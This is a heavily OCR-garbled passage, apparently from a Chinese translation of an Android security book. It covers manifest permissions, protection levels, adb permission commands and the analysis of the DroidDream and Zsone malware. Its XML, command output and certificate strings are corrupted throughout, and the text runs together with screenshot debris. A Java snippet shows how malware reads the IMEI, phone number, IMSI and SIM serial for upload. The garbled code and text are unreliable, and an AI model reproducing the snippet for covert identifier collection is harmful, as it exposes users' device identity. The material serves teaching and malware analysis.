置 文件 〈 即 Manifest 文件 ) 中 声明 所 需 权 限 。 

当 应 用 程序 安装 时 ，Android 系统 会 向 用 户 列 。 lb 
出 其 所 需 的 权限 ， 供 用 户 同意 或 拒绝 ， 如 图 EMIL 
4.4 所 示 。 用 户 不 能 有 选择 地 (部 分 地 ) 接受 wem 

应 用 程序 所 需 的 权限 ， 也 就 是 说 ， 用 户 不 能 选 
择 只 接受 应 用 程序 访问 互联 网 的 权限 请 求 ， 而 
拒绝 访问 短信 息 的 权限 。 对 于 应 用 程序 请 求 的 
一 组 权限 ， 用 户 要 么 全 部 接受 ， 要 么 全 部 拒 
26, 一旦 用 户 接 受 这 些 权 限 ，Android AAH 
通过 Linux 内 核 多 许 应 用 程序 执行 请 求 的 操作 ， oth a 
或 同 其 他 应 用 程序 或 组 件 进 行 交互 。 需 要 注意 es == 
的 是 ， 一 旦 用 户 批准 应 用 程序 所 需 的 权限 ,就 ”图 4.4 应 用 程序 安装 时 权限 请 求 
不 能 再 次 撤销 它们 ， 唯 一 办 法 只 有 和 镍 载 该 应 用 

程序 。 这 是 因为 Android 系统 不 能 在 运行 时 赋予 权限 ， 因 为 这 样 会 导致 应 用 程序 的 
用 户 友 好 程度 体验 降低 。 

如 图 4. 5 所 示 ， 当 从 官方 Android 应 用 市 场 下 载 应 用 程序 时 ， 官 方 的 Android 

YR = 但 不 是 所 有 的 Android 应 用 
市 场 都 如 此 ， 毕 竟 现 在 有 相当 多 的 Android 应 用 程序 下 载 来 源 。 如 果 用 户 只 是 下 载 
了 .apk 安装 文件 ， 那 么 只 能 在 该 文件 安装 时 ， 用 户 才 能 看 到 系统 显示 的 安 闭 该 软 
件 可 能 存在 的 安全 问题 的 警告 


4.3.1 权限 请 求 


在 默认 情况 下 ，Android 应 用 程序 不 能 执行 任何 操作 ， 这 显然 会 影响 到 应 用 和 在 
序 的 用 户 体 验 ， 以 及 对 设备 上 的 数据 访问 ， 所 以 Android 应 用 程序 需要 "mov H 
请 求 这 些 受 保 护 的 Android 特性 。 这 些 特 性 在 Android Manifest 文件 中 请 求 ， 相 对 于 
之 前 讨论 的 Linux 权限 ， 通 常 将 这 些 请 求 称 为 Manifest 权限 。 请 求 的 权限 需要 在 
Manifest 文件 内 部 的 « uses- permission > 标签 下 声明 。 下 面 是 一 个 应 用 程序 请 求 访问 
互联 网 和 读 取 MMS (Multimedia Messaging Service， 多 媒体 短信 服务 ) 信息 (H 
也 称 为 彩信 ) 5 SMS (Short Messaging Service， 短 信服 务 ) 信息 (通常 也 称 为 短 
fa) 权限 的 例子 : 


Do you want to install this application 


Allow tnis application to: 


A Your messages 


» Services that cost you money 


Hide e 
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«manifest xmlns:android-"http://schemas.android.com/apk/ 
res/android" 

package-"com.android.app.foobar" » 

«uses-permission android:name-"android.permission. 
INTERNET” /> 

«uses-permission android:name-"android.permission. 
READ SMS" /» 


«uses-permission android:name-"android.permission. 
READ  MMS" /» 


«/manifest» 


| Permissions 


. THIS APPLICATION HAS ACCESS TO THE FOLLOWING: 


YOUR ACCOUNTS 

; MANAGE THE ACCOUNTS LIST 

Alyws an agpication to perfoc opecaons Ig adding. and removing eocounts and deletng ther password 
USE THE AUTHENTICATION CREDENTIALS OF AN ACCOUNT 

Allows an appicotion to request autheotcation tons 

YOUTUBE 

Allows anpiicatons to can i^ to YouTube using the sccounrm) siod on this phone. 

YOUTUBE USERNAME 3 

Gmail Allows; applications fo see fe YouTube usesmisme/s! assocsated with the Google account(s) stored on Mis phone 





NEC GOOLE nc * 


mo 9 ww DIms mH 


NETWORK COMMUNICATION 





"res FULL INTERNET ACCESS 
Google Trans!ate Altes an^ anpication to create cetwork voces 
SOQULE WO 9 
$e (Hes PHONE CALLS 
Free READ PHONE STATE AND IDENTITY 
Atows the a o0boabon to eoss the phone Inetunes of the device An apolicason with this partisson can detemine 
v : " i the phone number and saca! number oi Uvs phong, whether a cardi is active, Ihe number hat call is connected? to and 
DINLE A ^e ika 
* 9*9 * 51858) 
free 
STORAGE 
his MODIFY/DELETE USB STORAGE CONTENTS MODIFYIDELETE SO CARD CONTENTS 
veur Dis ' Alows an application to wrie io Me USB storage Alces an application io wrüe io rhe SD card 
l YouTube Remote 
ODOQOGLE KG 9 SYSTEM TOOLS 
essin CHANGE NETWORK CONNECTIVITY 
Fine Alicws an application (o change the sista of network oonmectivity 


PREVENT DIVICE FROM SLEEPING 
Alcws an application to preventi me device from paing to sep 


图 4.5 Android 应 用 市 场 显 示 的 YouTube 应 用 程序 所 需 的 权限 列表 


如 果 应 用 程序 试图 执行 没有 权限 的 操作 ， 如 读 取 SMS 信息 ，Android 系统 会 抛 
回 一 个 SecurityException (安全 异常 ) 给 该 应 用 程序 。Android 定义 了 大 量 的 默认 权 
限 ( 即 Manifest 权限 ) ， 涉 及 大 量 的 应 用 程序 功能 ， 如 读 取 SMS 信息 、 发 送 MMS 
信息 、 访 问 互 联网 和 挂 载 文件 系统 等 。 而 且 ， 应 用 程序 还 可 以 自 定 义 权 限 。 例 如 ， 
应 用 程序 通过 Activity 或 其 他 组 件 提 供 自己 的 功能 给 其 他 应 用 程序 使 用 ， 或 应 用 程 
序 想 要 执行 自己 定义 的 权限 ， 而 不 愿 让 其 他 应 用 程序 知道 。 

如 果 应 用 程序 想 要 控制 指定 的 其 他 应 用 程序 (或 它们 的 组 件 ) 启动 /访问 自己 
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的 Activity, HJ E Manifest 文件 中 使 用 如 下 的 权限 类 型 实现 : 
«manifest xmlns:android-"http://schemas.android.com/apk/ 


res/android" 
package-"com.android.app.foobar" » 
«permission android:name-"com.android.app.foobar. 
permission.EXP FEATURE" 
android:label-"8string/permlab EXP FEATURE" 
android:description-"8string/permdesc EXP FEATURE" 
android:permissionGroup-"android.permission-group. 


COST MONEY" 
android:protectionlevel-"dangerous"/» 


«/mariifüsbs 

上 述 代 码 段 中 ，android，name 属性 为 新 建 的 目 定 义 权 限 的 名 称 ， 应 用 程序 可 
以 在 Manifest 文件 的 < uses- permission > 标签 中 使 用 此 权限 。android: label 属性 为 
权限 的 短 名 称 ， 显 示 给 用 户 。android: description 属性 用 于 描述 权限 的 详细 信息 。 
例如 ， 当 权限 的 android: label 属性 为 “EXPENSIVE FEATURE" Hj, android: 
description 属 性 可 以 这 样 描述 该 权限 : “该 权限 允许 应 用 程序 发 送 付 费 SMS 信息 和 
接收 MMS 信息 ， 这 会 增加 你 的 支出 ， 因 为 这 将 计 费 到 你 的 通话 时 间 ”。android: 
protectionLevel 属性 定义 了 用 户 批准 该 权限 可 能 承担 的 风险 级 别 。 在 防护 类 别 中 共 
有 四 个 风险 等 级 ， 见 表 4. 1。 

表 4.1 Android 用 户 防 护 等 级 
防护 级 别 说 明 
默认 的 权限 值 ， 允 许 应 用 程序 访问 那些 不 会 对 其 他 应 用 程序 、 用 户 或 系统 产生 太 大 风 


普通 级 
险 的 特性 。 hec big 不 过 用 户 仍 然 可 以 在 应 用 程序 安装 时 查看 到 这 类 权限 
危险 级 允许 应 用 程序 执行 某 些 操作 ， 这 些 操 作 可 能 会 让 用 户 支付 一 定 的 费用 或 获取 用 户 的 资 
料 ， 对 用 户 造 成 一 定 的 负面 影响 。 这 类 权限 是 需要 用 户 明确 批准 的 权限 
签名 级 只 授予 同 权限 声明 程序 使 用 相同 证 书签 名 的 应 用 程序 
签名 /系统 级 只 授予 Android 系统 应 用 程序 ， 或 与 Android 系统 应 用 程序 使 用 相同 证 书签 名 的 应 用 


程序 


执行 “adb shell pm list permissions-g" 命令 能 够 获得 一 张 所 有 权限 的 列表 ， 表 
中 权限 以 分 组 的 形式 组 织 ， 如 图 4. 6 所 示 。 

如 图 4.7 所 示 ， 执 行 “adb shell pm list permissions-f" 命令 ， 可 以 获得 系统 定 
义 的 所 有 权限 的 详细 信息 。 

如 图 4. 8 所 示 ， 执 行 “adb shell pm list permissions-s" 命令 ， 可 以 显示 相连 设 


备 上 的 所 有 可 用 权限 。 
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pentestusrlétools-gibbons-vm-2:-$ adb shell pm list permissions -g 
All Permissions 


group:android.permi 5s510n-group . DEVELOPMENT. TOOLS 
permission:android.permission.SIGNAL PERSISTENT PRO 
permission:android.permission.SET ALWAYS FINISH 
penmission:android.permisstion.SET. DEBUG. APP 
permission:android.permi ssion.SET PROCESS LTMIT 


group:android.permission-group.PERSONAL. INFO 
permisston:ondroid.permi ssion, READ. USER. DICTIONARY 
permission:ondroid.permission. WRITE CONTACTS 
permission:com.andeooid.browser.permission. WRITE HISTORY. BOOKMARKS 
permission:androiíd.permission.BIND APPWIDGET 
perm:ssion:com.android.browser,permission.READ HISTORY BOOKMARKS 
nssion:com.condroid.ciarm. permission. SET. ALARM 
sston:android.permission.READ. LOGS 
ssion:android.permission.READ CONTACTS 
i)n: andecoid,permission.READ CALENDAR 
ston;android.permission,WRITE CALENDAR 
sston:androíd.permtission, DUMP 
)n:and^oid.permission.WRITE USER. DICTIONARY 


group:android.permission-group. COST. MONEY 
permission:android.permission.SEND. SMS 
permission.android.permission, CALL PHONE 


group: android.permission-group. LOCATION 
permisston:android.permission. ACCESS MOCK LOCATION 
permission:android.permission, ACCESS LOCATION EXTRA. COMMANDS 
permission: android.permission. ACCESS COARSE. LOCATION 
permisston:;android.permission, ACCESS. FINE. LOCATION 


group : android.penrm ssion-gnroup MESSIS ES 
permission:ondroid.permission.BROADCAST . SMS 
penrmssion:android.perm ssion,. BROADCAST. WAP - PUSH 
permission:android.permission.WRITE. SMS 
permission:android.permi 5sion. READ. SMS 
permission:com.andccid.; emoil,permission.READ ATTACHMENT 
permission:android,permission, RECEIVE. SMS 
nermission:android.permission RECEIVE. WAP. PUSH 
permission:android.permisston.RECEIVE. MMS 





图 4.6 Android 系统 权限 (分 组 显示 ) 


4.3.2 权限 组 合 使 用 


总 的 来 说 ，Linux 内 核 将 所 有 的 应 用 程序 沙 箱 化 ， 并 通过 执行 UID 或 GID 权限 
机 制 提 供 系统 安全 性 。 同 时 ，Android 应 用 程序 还 需要 额外 的 权限 ， 只 有 用 户 批 准 
后 ,才能 在 Android 系统 上 安装 。 所 有 的 应 用 程序 ， 无 论 是 Java 程序 、 本 地 代码 程 
序 还 是 Java 和 本 地 代码 混杂 程序 ， 在 Android 系统 上 都 通过 同样 方式 沙 箱 化 。 

对 于 一 些 底层 权限 ，Android 系统 需要 将 相应 的 权限 字符 串 映射 到 能 够 访问 对 应 
功能 的 群 组 。 例 如 ， 当 应 用 程序 申请 android. permission. INTERNET 权限 请 求 访 问 互 
联网 时 ， 用 户 批准 后 ，Android 系统 将 该 应 用 程序 加 入 到 inet 群 组 。 成 为 inet 群 组 成 
员 后 ， 应 用 程序 才 有 互联 网 访问 权限 。 这 些 映射 关系 定义 在 /system/etc/platform- 
xml/ 目 录 下 的 platform. xml 文件 内 。 高 级 别 的 权限 由 Android 系统 在 运行 时 进行 约束 。 
对 于 Android 应 用 程序 来 说 ， 请 求 的 权限 必然 要 比 需要 用 户 授权 的 权限 多 。 

/ system/etc/platform- xml 文件 定义 了 底层 系统 用 户 ID 与 群 组 ID 同 特定 的 权限 


KP 
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图 4.7 执行 “adb shell pm list permissions-f ”命令 


estusriftogls-gilbbons-vm-2:-$ adb shell pe list pecmissiont -5 
1l Permissions: 


Devsl orment tools: Send Linux 5 gnal« to ooplicot ions, make nll bockground appi 41) 8 E04. close, enahle app! ication dé bugging, limit number of 
Tour personol inforezGtion: read user defined dictionary, wcite contact dato, write Bcowsen's nmistory and bookmarks, choose widoets, 
bookmarks, set glore in OLDP clock, reod sensitive log dota, read contoct dota, reod calendar events, odd or modify calendor events an 
2.2145 1 - meeoerral 312212 22. 4591 tö user defined dictionary 

Secveiors that cost yog coney: send SMS messoges, diréctly cail phooe numbers 


Your Location: sötk locotion sources for testing, cccess extea locaton provider commonds, 


Your messoges: send SMS-recelved broadcast, send WAP-PLISH-received broadcost, edit SMS « 
P, receive MMS 


Metwork communication: view network state, create Bluetooth connections, 
ive Internet calls, Control Mean" Field Communication 


Lf T deles laid MERC EL on orcomt Suthenticotn, moncoe the riccount t, dlicover known or 
Account MonopgerSser 


stcte and identity, "odify phone stat Intercept outgoing colis 
"NG"* Controls: control flashlight, test hordwaore, toke ctures ond videos, record audio, change your oudio Settings, access USB. devi c! 
Syster tools: gilos Wi-Fi Multicast reception, delete all opplication cache dato, get information on interngl Storage, set prefer ed applici 
tion clwoy*s fuh, Chonge background dota usaie setting, uninstall shortcuts, force stop other applications, ki 1 background processes, [1] 


pa líst permissi, 
pertestusrlðtoolu-gibbons-vm-Z:=$ 


图 4.8 执行 “adb shell pm list permissions-s” 命令 输出 显示 


之 间 的 映射 关系 ， 如 图 4.9 所 示 。 
例如 ， 应 用 程序 “Foobar” 需 要 访问 互联 网 ， 并 且 能 够 读 取 SMS 和 MMS 信 
息 。 因 此 ， 该 应 用 程序 所 需 权限 的 声明 如 图 4. 10 Bran o 


«uses-permission android:name-"android.permission.INTERNET" /? 
«uses-permission android:name-"android.permission.READ SMS" /? 
«uses-permission android:name-"android.permission.READ _ MMS" /» 
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«permissions» 


The following tags are associating low-level group IDs with 
permission names. By specifying such a mapping, you are saying 
that any application process granted the given permission will 
also be running with the given group ID attached to its process, 


so it can perform any filesystem (read, write, execute) operations 


that group. --» 


, name-"android.permission.BLUETQOTH . ADMIN 
«group 日 i Gd= nert Dt admin” /» 


«/permission» 


cpermission names"android.permission.BLUETOOTH" > 
«group gide"net bt" /» 


c/permission» 


«permission noame="android. permission. INTERNET" > 
«group gid= inet /> 
</permisston> 





图 4. 9 android: permission. INTERNET 权限 同 GID inet 的 映射 关系 


«/ package» 

«packoge namee"com.mj.iColendar" codePath»" /data/app/com.mj. iCalendar-1.gpk" notivelibranryPathe" /dota/datg/com.mj.iCalendar/lib" *lagse"B 

'132adfdfaSB" ut«"132adfüfa58" versione"2" userld-" 10036» 

«sigs counte"1"» 

«cert indexe"5^" keys" 3887021530820170000302910202044d259eb C300d060970864886* 7040101059500 304631900 300906035504061 302 38 363106 30090603558208 

040713024346310036003060355040013074040319b3900906035504901302404031003009000355040313024d403020170d3131393139363130353134385018607323131303 

0463108b39090003558406136523836310b5300950693550408136253483100300900603550640713024346e310030090003955048a13624d40310Qb380909060355040b13024d40310 

30819*3004060920864886f 76d01010105000381840030818902818100991 0665510603 7a00f dd071744c42 d60c9326c 7 c6C2be 3b 7b 76d9db f d75ceBodaaScASfe1b52a1aSd. 

074014d1685f003ef c128c2608fb7c23816930? d? f659086031f53b3e8f2700474f06721437556771c€85c738ce65c5571C513eac6d7 f 49006807 f 03e f 0t 27 db 16e 54 d6 Pd. 

0100013002306092a0864886 f 70001010505000381810071bf29e3308cco279cd032228* 323269 80086G54 cBoac 785 Fc7e36e 720447 76f68664a217D007be3odecb6febf 38df CZ 
aQe75177e316d60d89408dd25b3e4c6c054 f 858e137169d3b 764426066610390604 750071051 * 5bod8815cc2 Bb9Sccd 12 R11dfed49e f 3045846] cB4d Sa feac94oecde * 6063104 
«Sis» 

«De rms» 

«item nome- androld.permisston.REAO, PHONE STATE" 人 

«item name= ündroid.permission; SET. WALLPAPER 

citen nome= android. permission, SEND_SMS™ /> 

«item nomeées"android.permission, WRITE. EXTERNAL. STORAGE” /> 

citen non android.pereisson. INTERNET 


n hone "android. permission, RECEIVE SNS" 


citem name=" gndroid. permission. ACCESS_COARSE_ LOCATION" 


titen mnt Dotd permLsston. RESTART PACKAGES 
</ Denrnms» 
c/package» 





4.10 ”应 用 程序 Foobar 所 需 权 限 


应 用 程序 Foobar 安装 时 ， 系 统 会 询问 用 户 是 否 批准 该 程序 使 用 上 述 请 求 权 限 。 用 
户 批准 后 ，Android 系统 在 platform. xml 文件 中 查找 “android: permission. INTERNET” 
权限 字符 串 对 应 的 GID。 由 于 应 用 程序 必须 加 入 inet GID 才能 拥有 互联 网 的 访问 权限 ， 
找到 该 权限 对 应 的 GID 后 ， 即 将 该 应 用 程序 进程 加 入 inet CID ， 从 而 实现 对 互联 网 的 访 
jo Xf F android. permission. READ. SMS 和 android. permission. READ_MMS 这 类 高 级 别 的 
权限 ， 则 由 Android 权限 管理 天 来 判定 该 应 用 程序 是 否 有 权 执 行 相应 的 操作 。 

在 设备 上 ， 没 有 用 于 应 用 程序 的 Manifest XML 文件 。Manifest XML 文件 只 用 在 
开发 人 员 编 写 创建 Android apk 文件 时 。 对 于 已 经 安装 在 系统 上 的 应 用 程序 来 说 ， 
如 果 要 想 查 看 程序 的 权限 ， 只 能 通过 查阅 设备 系统 上 /data/system 目录 下 的 packa- 


A xa 
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ges. xml 文件 ， 如 图 4. 11 所 示 。 


i n roay 7A , : o Lens »nn T a earn hu Anean Jintan Po i 
ity.Leg codePath= /data/app/ com Beauty. Leg l.üapk nativeiibDran^yrarne /Ga0ta/QOdto/ cor 'üuty. Leg 


r E d "273^ r Hé Ang | e " UNA 2 . 
137o0df49444" utes"1320df4G444" version- 1 usen"lid- 10054 > 


MS UID $ 308201 1c600302010207044do0600cd 300da a 8GA RRG f 7030101050509 3010311503919900355049313124406167696320528 
'0d31313034313430383035333350180£32313131303332313038 3035 EI 30140311b30190060355040 1 76963205 
*3006d06092cB64886f 70001010105000351842003081890281810099X m bie wat 75301e5eecaoa3ct 7446 38e 908dc1 
r63c5d490eco 20807 014365d5dc30902b MER aO o9ecc935840032df6790f 756ba9ad68beo6113d5066 75859c 
jë Ee OA RcSRaRO4260e616e2ee12bb48* f 6b2e39144807d690; 20301000 3004 06992086 XSB6T7 0001010505000383131092d 
» a " 


1938fc5196a0ec697 f61bb4536b5 3466c 11045 e46900d2a1b40b68559 1960 76688c43 97 Abac? 
e. is CERE 18b6033a23187c394b419db4dba375ecof5d10af06c374*0434dbe19109802e940000250024585 PIACE 


ssion. READ. PHONE STATE" 7> 
emission. SET WALLPAPER" /> 
‘armi ssion., INTERNET” /> 





图 4.11 p ZA HARET W ANR 


需要 系统 执行 权限 验证 的 情景 有 : 

e 应 用 程序 执行 时 。 

e 应 用 程序 执行 没有 授权 的 功能 时 。 

e 应 用 程序 启动 没有 授权 的 Activity 时 。 

e 应 用 程序 发 送 或 接收 广播 Intent 时 。 

e 访问 或 更 新 Content Provider ( HAEHAE) 时 。 
e 应 用 程序 创建 服务 时 。 


4.4 移动 设备 安全 问题 


同 其 他 移动 操作 系统 一 样 ，Android 系统 也 会 遭受 各 种 传统 安全 问题 的 威胁 。 
下 面 讨论 的 这 些 问题 对 于 所 有 的 移动 平台 都 是 很 常见 的 ， 并 不 局 限于 Android 系 
统 。 其 中 一 些 问 题 也 会 出 现在 传统 设备 上 ， 如 笔记 本 电脑 ， 而 其 他 的 一 些 问题 则 仅 
针对 于 移动 设备 。 


4.4.1 设备 


很 多 人 丢 过 手机 。 在 智能 手机 出 现 之 前 ， 这 意味 着 将 失去 其 他 人 的 联系 信息 。 
但 在 智能 手机 (如 Android FHL) 大 量 普 及 的 今天 ， 对 于 大 部 分 人 来 说 这 将 导致 至 
掉 更 多 的 信息 ， 如 : 

e 移动 设备 上 存储 的 电子 邮件 。 

@ 日 动 登录 Facebook, Twitter, Youtube, Flickr 等 社交 网 站 。 

e 银行 账号 信息 。 

e 位 置 和 GPS 记录 。 

e 个 人 健康 资料 。 
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如 果 移 动 设备 没有 加 密 ， 设 备 丢失 还 可 能 导致 资料 信息 泄露 的 风险 。 比 如 ， 将 
手机 连接 在 电脑 上 ， 可 以 通过 很 多 工具 ( 如 各 种 取证 软件 ) 提取 手机 上 面 的 数据 。 


4.4.2 漏洞 修补 


本 书 编 写 时 ，Android 系统 最 新 的 发 布 版 本 是 3.2。 然 而 ， 目 前 大 多 数 设备 仍 
然 运行 着 Android 1. 5 ~ 2. 3 之 间 的 各 种 版 本 ， 其 中 2.2 和 2.3 版 本 是 现存 最 主流 的 
Android 系统 版 本 。 而 且 ， 这 些 设 备 的 Android 系统 更 新 或 改进 都 是 由 各 目 厂 商 完 
成 的 ， 因 此 ， 很 难 及 时 地 对 操作 系统 的 漏洞 进行 持续 地 修补 。 相 对 于 这 一 点 ， 在 本 
书 编写 时 ， 现 存 的 iPhone 系统 只 有 iOS 3 和 i0S 4 两 个 版 本 。 


4.4.3 外 部 存储 


使 用 可 插 拔 的 外 部 存储 会 增加 数据 安全 风险 ,遗失 SD 卡 要 比 遗 失手 机 更 容 
易 。 大 多 数 情况 下 ，SD 卡 上 的 数据 都 是 未 经 加 密 的， 非常 容易 被 人 从 中 获取 用 户 
资料 。 而 且 ，SD 卡通 第 在 多 个 设备 上 频 凤 地 插 拔 使 用 ， 更 增加 了 遭遇 恶意 软件 启 
抽取 数据 的 风险 。 再 者， 可 插 拔 存储 设备 十 分 脆弱 、 容 易 造 成 数据 丢失 和 损坏 ， 


4.4.4 键盘 


屏幕 软 键盘 是 一 个 非常 流行 的 功能 特性 ， 但 从 安全 专家 的 角度 来 看 ， 软 键盘 存 
在 着 非常 大 的 安全 隐患 。 尤 其 在 火车 上 或 响 啡 厅 使 用 软 键 盘 输 入 敏感 信息 ,会 给 
“ 肩 宽 SS” 者 提供 非常 便利 的 机 会 窥探 他 人 隐私 。 这 种 情况 在 平板 电脑 上 更 为 严重 ， 
因为 平板 电脑 能 够 显示 完整 的 键盘 ， 输 入 的 字符 信息 会 以 短暂 几 秒 的 明文 形式 反馈 
给 用 户 ， 很 容易 被 他 人 窥视 。 甚 至 ， 输 入 字符 后 在 屏幕 上 留 下 的 指纹 痕迹 也 会 帮助 
攻击 者 急 取 信息 。 


4.4.5 数据 隐私 


Google 地 图 是 Android 设备 上 最 流行 的 应 用 程序 之 一 ， 许 多 其 他 应 用 程序 能 够 
与 Google 地 图 交互 ,使 用 Google 提供 的 用 户 位 置信 息 。 然 后 ， 将 这 些 信息 存储 到 
自己 的 缓存 中 。 继 而 ， 基 于 这 些 位 置信 息 向 用 户 显示 广告 或 提供 最 近 的 咖啡 厅 快 
Bü. 但是， 这 种 机 制 的 安全 底线 是 ， 只 有 有 具有 特定 权限 的 应 用 程序 才能 获取 这 些 位 
置信 息 。 一 段 时 间 后 ， 通 过 运行 在 后 台 的 GPS 跟 踊 右 获取 的 这 些 数 据 就 能 揭示 出 
有 关 用 户 习惯 的 敏感 信息 。 


4.4.6 应 用 程序 安全 
相对 于 传统 的 、 完 备 的 IT (Information Technology， 信 息 技 术 ) 应 用 程序 ， 移 


日 ” 肩 帘 ， 指 的 是 越过 肩膀 探 看 别人 操作 获取 信息 的 做 法 。 一 一 译 者 注 
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动 应 用 程序 更 容易 受到 攻击 。 由 于 移动 设备 的 数据 特点 ， 传 统 的 攻击 方式 ， 如 SQL 
注入 (SQL Inject, SQLi) 、 跨 站 点 伪造 请 求 (Cross- Site Request Forgery, XSRF), 
路 站 点 脚本 ( Cross-Site Scripting, XSS) 等 攻击 不 仅 会 在 移动 平台 和 应 用 程序 上 出 
现 ， 甚 至 还 可 能 衍生 出 更 加 严重 的 攻击 。 移 动 设备 上 弱化 的 SSL (Secure Sockets 
Layer， 安 全 套 接 层 ) 功能 或 加 密 缺 失 等 问题 ， 很 可 能 导致 移动 应 用 程序 面临 各 种 
诸如 网 络 钓鱼 、 绕 过 身份 认证 ， 以 及 会 话 固定 等 攻击 方式 的 威胁 。 


4.4.7 遗留 代码 


CSM 或 CDMA 制式 通信 的 大 部 分 底层 代码 多 年 来 都 没有 做 过 改动 ， 这 些 设 备 
驱动 代码 基本 没有 考虑 安全 措施 ， 很 容易 受到 老式 攻击 方式 的 威胁 (例如 ， 栈 洲 
出 攻击 等 )。 而 且 ， 如 今 的 新 设备 仍然 依赖 于 这 些 传统 的 底层 代码 。 事 实 上 ， 很 多 
新 的 代码 都 是 在 这 些 遗 留 代码 的 基础 上 增加 的 。 因 此 ， 存 在 一 定 的 安全 隐患 。 


4.5 近期 主要 的 Android 系统 攻击 事件 


2011 年 3 月 第 一 周 ， 一 款 名 为 “DroidDream” HES 4X4 FZeih f Android 系统 
平台 。 与 i0S 系统 相 比 ，Android 系统 更 加 开放 。 因 此 ，Android 系统 上 的 应 用 市 场 
政策 也 相对 宽松 。Google 没有 对 应 用 市 场 上 的 软件 进行 严格 的 审查 管理 ， 甚 至 ,也 
不 会 像 苹果 公司 那样 对 Android 软件 的 发 布 渠道 进行 限制 。Android 应 用 软件 可 以 
通过 各 种 渠道 获得 ， 如 ; 

e 官方 Android 应 用 市 场 ， 即 Google 公司 自 有 的 应 用 程序 市 场 。 

@ 二 级 Android 应 用 市 场 ， 如 亚马逊 等 。 

e 区 域 化 的 Android 应 用 市 场 和 应 用 程序 商店 ， 如 中 国 、 韩 国 等 国内 的 应 用 疡 。 

e 直接 向 用 户 提供 apk 文件 下 载 的 网 站 。 

类 似 于 其 他 的 恶意 软件 ， 例 如 Geinimi, HongTouTou 等 ，DroidDream 隐藏 或 混 
入 到 貌似 合法 的 应 用 程序 中 。 由 于 一 般 用 户 都 会 信任 从 Android 应 用 市 场 下 载 的 应 
用 ， 绪 果 使 自己 的 设备 遭受 该 恶意 软件 的 感染 。 

该 恶意 软件 事件 爆发 后 ，Google 公司 采用 一 种 不 寻常 的 措施 ， 即 启用 远程 删除 
功能 ， 将 被 感染 设备 上 的 恶意 软件 删 掉 。 据 统计 ， 在 这 些 受 感染 的 设备 上 有 将 近 
50 款 应 用 程序 被 视 为 恶意 软件 。DroidDream 及 其 变种 能 够 获得 敏感 的 用 户 信 息 和 
设备 信息 ， 甚 至 获取 root 权限 。 如 果 读 者 想 要 查看 此 次 恶意 软件 事件 中 全 部 恶意 应 
用 程序 的 名 单 ， 请 使 用 Google 搜索 “MYOURNET” 关 键 字 查询 。 


4.5.1 DroidDream 变种 程序 分 析 


本 节 通 过 分 析 这 款 恶 意 程序 ， 以 确定 这 款 恶 意 程序 使 用 的 权限 和 潜在 的 影响 。 
通过 将 该 恶意 程序 安装 在 模拟 器 上 ， 查 看 其 请 求 的 权限 ， 如 图 4. 12 所 不 。 
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恶意 软件 信息 : zsone (iMatch，iCalendar 等 ) 





{ | 
| 风险 级 别 : Xv 破坏 性 : AAA Xd: * 
| | 
| 概述 感染 信息 ^a erm px 
| 名 称 zsone (iMatch, iCelendar and others ) | 
| 恶意 软件 类 型 rosa | 
| 地 区 位 置 All around | 
| 评分 5 | 

”发 现 日 期 11.05.2011 | 

收录 日 期 11.05.2011 


| 
| 
| 
这 款 和 恶意 软件 能 够 不 经 过 用 户 允 许 ， 即 可 发 送 SMS 短 信息 。 它 有 几 个 变种 ， 每 个 变种 程序 都 有 自己 的 名 称 ， 如 | 
iMatch: iCalendar', 该 软件 被 安装 后 ， 会 等 待 一 段 时 间 ， 然 后 不 经 过 用 户 自 行 订阅 付费 服务 。 通 过 后 台 服 务 
发 送 SMS 短 信息 ， 自 动 避 开 用 户 注意 ， 使 用 户 为 这 些 付费 业务 、SMS 短 信息 支付 费用 . 

该 应 用 程序 已 经 被 Google 从 Android 应 用 市 场 上 删除 . | 
用 户 可 以 使 用 AVG 移 动 版 杀毒 软件 检测 并 删除 这 类 恶意 软件 ， | 


eS boo — HÀ es he 5 





4.12 Èri DroidDream FR Bg 4X PERO. 


从 下 面 的 代码 段 可 以 看 到 ， 该 恶意 程序 共 请 求 了 三 种 权限 : READ. PHONE. 


STATE, SET WALLPAPER 和 INTERNET, 


«perms» 
«item name-"android.permission.READ PHONE STATE" /» 


«item name-"android.permission.SET WALLPAPER" /» 
«item name-"android.permission. INTERNET" /» 
</perms> 


从 请 求 的 这 些 权 限 上 来 看 ， 该 应 用 程序 似乎 是 一 个 壁纸 程序 。 然 而 , -该 应 
用 程序 还 想 要 访问 手机 状态 。 We 仿 访 问 权 限 的 应 用 程序 能 够 获取 下 述 
信息 

e IMEI (2^ (也 称 设备 ID). 

e 电话 号 码 。 

e SIM 卡 序列 号 。 

e 用 户 识 别 码 (IMSI)。 

下 述 代码 段 能 够 使 应 用 程序 获得 敏感 的 电话 信息 : 


全 “通过 模拟 器 上 的 /data/system/packages, xml 文件 ， 查 看 DroidDream 应 用 请 求 的 权限 信息 。 一 一 原 书 注 

C  IMEI (Intemational Mobile Equipment Identity， 国 际 移动 设备 识别 码 ) 是 一 个 15 ~ 17 位 数字 组 成 的 电 
子 捉 号 ， 用 于 了 唯一 标识 网 络 上 的 移动 设备 。 通 过 该 串 号 ， 移 动 运 营 商 能 够 终止 被 偷 或 丢失 的 设备 使 
用 服务 。 一 一 原 书 注 
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TelephonyManager telephonyManager -(TelephonyManager) 
getSystemService(Context.TELEPHONY SERVICE); 


String IMEI NUM = telephonyManager.getDeviceId(); 
String Phone NUM = telephonyManager.getLinelNumber (); 
String IMSI NUM = telephonyManager.getSubscriberId(); 
String SIM NUM = telephonyManager.getSimSerialNumber(); 


恶意 程序 获得 上 述 设备 信息 后 ， 就 可 以 在 后 台 将 这 些 信息 发 送 到 远程 服务 器 。 之 所 
以 Android 系统 能 够 允许 该 恶意 程序 这 样 做 ， 还 取决 于 该 恶意 程序 获得 了 另 一 个 重要 的 
权限 : android. permission. INTERNET， 该 权限 可 以 使 程序 同 外 部 网 络 建立 连接 。 


4. 5.2 Zsone 手机 木马 程序 分 析 


接 下 来 ， 本 节 分 析 另 一 个 名 为 “Zsone” 的 手机 木马 程序 ， 该 木马 程序 使 用 了 
不 同 的 名 字 伪 装 自己 ， 如 iCalendar, iMatch 等 。Zsone 手机 木马 程序 出 现在 2011 年 
夏季 ， 它 能 够 不 经 用 户 人 允许 发 送 SMS 信息 ， 同 DroidDream 木马 程序 一 样 ，Zsone 手 
机 木马 程序 已 经 被 Coogle 公司 从 Android 应 用 市 场 删除 。 

从 隐藏 了 Zsone 木马 程序 的 日 历 应 用 程序 的 代码 分 析 中 可 见 ， 该 应 用 程序 请 求 
获取 下 列 权 限 : 


«item name-"android.permission.READ PHONE STATE" /> 

